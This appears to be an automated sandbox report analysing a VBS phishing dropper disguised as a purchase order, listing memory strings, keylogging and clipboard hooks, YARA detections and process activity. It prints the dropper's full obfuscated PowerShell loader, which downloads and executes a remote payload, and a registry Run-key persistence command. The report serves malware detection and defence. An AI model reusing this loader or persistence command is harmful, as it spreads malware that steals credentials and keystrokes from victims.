                Source: bhv88BF.tmp.16.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                Source: powershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558083418.0000000007706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2604146948.000001DB95BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.mic
                Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: powershell.exe, 00000002.00000002.2668709649.000001DBA5DCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005FB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: wab.exe, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv88BF.tmp.16.drString found in binary or memory: https://www.office.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50573
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownHTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.6:50573 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041183A OpenClipboard,GetLastError,DeleteFileW,16_2_0041183A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,16_2_0040987A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004098E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_00406DFC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_00406E9F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,18_2_004072B5

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2264, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

                System Summary

                barindex
                Source: amsi32_3892.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1908, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3892, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Initial file: Call Cringingness.ShellExecute("P" & Papirdokumenter, penates, "", "", Luggnagg51)
                Source: TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsStatic file information: Suspicious name
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3851
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3851
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3851Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3851Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;UJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_04B422D5 Sleep,NtProtectVirtualMemory,11_2_04B422D5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00401806 NtdllDefWindowProc_W,16_2_00401806
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004018C0 NtdllDefWindowProc_W,16_2_004018C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004016FD NtdllDefWindowProc_A,17_2_004016FD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004017B7 NtdllDefWindowProc_A,17_2_004017B7
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348AB5162_2_00007FFD348AB516
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348AC2C22_2_00007FFD348AC2C2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A3DFA2_2_00007FFD348A3DFA
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EB719411_2_20EB7194
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EAB5C111_2_20EAB5C1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B04016_2_0044B040
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0043610D16_2_0043610D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044731016_2_00447310
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044A49016_2_0044A490
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040755A16_2_0040755A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0043C56016_2_0043C560
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B61016_2_0044B610
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044D6C016_2_0044D6C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004476F016_2_004476F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B87016_2_0044B870
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044081D16_2_0044081D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041495716_2_00414957
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004079EE16_2_004079EE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00407AEB16_2_00407AEB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044AA8016_2_0044AA80
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00412AA916_2_00412AA9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404B7416_2_00404B74
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404B0316_2_00404B03
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044BBD816_2_0044BBD8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404BE516_2_00404BE5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404C7616_2_00404C76
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00415CFE16_2_00415CFE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00416D7216_2_00416D72
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00446D3016_2_00446D30
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00446D8B16_2_00446D8B
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00406E8F16_2_00406E8F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040503817_2_00405038
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0041208C17_2_0041208C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004050A917_2_004050A9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040511A17_2_0040511A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0043C13A17_2_0043C13A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004051AB17_2_004051AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044930017_2_00449300
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040D32217_2_0040D322
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044A4F017_2_0044A4F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0043A5AB17_2_0043A5AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0041363117_2_00413631
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044669017_2_00446690
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044A73017_2_0044A730
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004398D817_2_004398D8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004498E017_2_004498E0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044A88617_2_0044A886
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0043DA0917_2_0043DA09
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00438D5E17_2_00438D5E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00449ED017_2_00449ED0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0041FE8317_2_0041FE83
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00430F5417_2_00430F54
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004050C218_2_004050C2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004014AB18_2_004014AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040513318_2_00405133
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004051A418_2_004051A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040124618_2_00401246
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040CA4618_2_0040CA46
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040523518_2_00405235
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004032C818_2_004032C8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040168918_2_00401689
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00402F6018_2_00402F60
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
                Source: TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
                Source: amsi32_3892.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
